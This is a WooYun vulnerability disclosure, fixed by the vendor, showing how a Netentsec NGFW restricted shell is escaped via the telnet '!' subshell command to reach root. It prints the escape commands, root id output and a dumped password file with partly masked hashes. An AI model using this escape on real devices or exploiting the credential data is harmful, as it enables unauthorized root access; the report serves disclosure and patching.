当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060065

漏洞标题:网康NGFW跳出沙盒直接访问设备内文件

相关厂商:网康科技

漏洞作者: 剑心

提交时间:2014-05-09 17:16

修复时间:2014-08-07 17:18

公开时间:2014-08-07 17:18

漏洞类型:非授权访问

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

听说提交网康的漏洞有钱拿

详细说明:

问题出在对telnet命令的判断上,只要telnet命令有参数,就允许执行(默认shell只能完成设备本身的管理相关的功能)。
但是进了telnet的命令,就可以执行外部命令了,包括shell

[root@NGFW ~]# telnet -n test
telnet> help
Commands may be abbreviated. Commands are:
close close current connection
logout forcibly logout remote user and close the connection
display display operating parameters
mode try to enter line or character mode ('mode ?' for more)
open connect to a site
quit exit telnet
send transmit special characters ('send ?' for more)
set set operating parameters ('set ?' for more)
unset unset operating parameters ('unset ?' for more)
status print status information
toggle toggle operating parameters ('toggle ?' for more)
slc change state of special charaters ('slc ?' for more)
z suspend telnet
! invoke a subshell
environ change environment variables ('environ ?' for more)
? print help information
telnet> !/bin/bash
bash: complete: -E: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
bash: complete: -D: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
[I have no name!@NGFW ~]# w
17:27:26 up 2:34, 1 user, load average: 3.19, 2.88, 3.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[I have no name!@NGFW ~]# id
uid=0 gid=0(root) groups=0(root),502(vyattacfg),503(vyattaop)
[I have no name!@NGFW ~]# exit
telnet> [root@NGFW ~]#
[root@NGFW ~]#

漏洞证明:

你们的系统竟然密码不写在shadow里面

root:$1$9HNbC4XF$打码5wFX1:15639:0:99999:7:::
bin:*:15805:0:99999:7:::
daemon:*:15805:0:99999:7:::
adm:*:15805:0:99999:7:::
lp:*:15805:0:99999:7:::
sync:*:15805:0:99999:7:::
shutdown:*:15805:0:99999:7:::
halt:*:15805:0:99999:7:::
mail:*:15805:0:99999:7:::
news:*:15805:0:99999:7:::
uucp:*:15805:0:99999:7:::
operator:*:15805:0:99999:7:::
games:*:15805:0:99999:7:::
gopher:*:15805:0:99999:7:::
ftp:*:15805:0:99999:7:::
nobody:*:15805:0:99999:7:::
distcache:!!:15805:0:99999:7:::
vcsa:!!:15805:0:99999:7:::
pcap:!!:15805:0:99999:7:::
ntp:!!:15805:0:99999:7:::
dbus:!!:15805:0:99999:7:::
apache:!!:15805:0:99999:7:::
mailnull:!!:15805:0:99999:7:::
smmsp:!!:15805:0:99999:7:::
sshd:!!:15805:0:99999:7:::
haldaemon:!!:15805:0:99999:7:::
netentsec:$1$UYIQ2Phc$U打码y.GiyvG7.Nu91:15805:0:99999:7:::
postgres:!!:15805:0:99999:7:::
quagga:!!:15805:0:99999:7:::
vyatta:!$1$y9RDC/fm$fs7/W打码pTG9k1:15805:0:99999:7:::
admin:$1$7Crwx2MW$2LvR打码Gbw6ZAfO0:15805:0:99999:7:::
lighttpd:!!:15805:0:99999:7:::
ldap:!!:15805:0:99999:7:::

修复方案:

多判断下参数

版权声明:转载请注明来源 剑心@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-12 09:48

厂商回复:

感谢反馈,将尽快发布更新补丁解决。

最新状态:

2014-07-14:已通过更新补丁解决


漏洞评价:

评论

  1. 2014-05-09 17:17 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    正常情况下shell是执行不了命令的?

  2. 2014-05-11 13:36 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @疯狗 可以执行啊

  3. 2014-05-12 17:42 | Arno ( 路人 | Rank:12 漏洞数:1 | ungelivable)

    尼玛,@iceyes ,这TM跟我一点关系都没有。

  4. 2014-05-12 22:08 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Arno ???

  5. 2014-08-07 17:25 | keke ( 路人 | Rank:6 漏洞数:8 | 目测和口算各种妹纸)

    @Arno 路人乙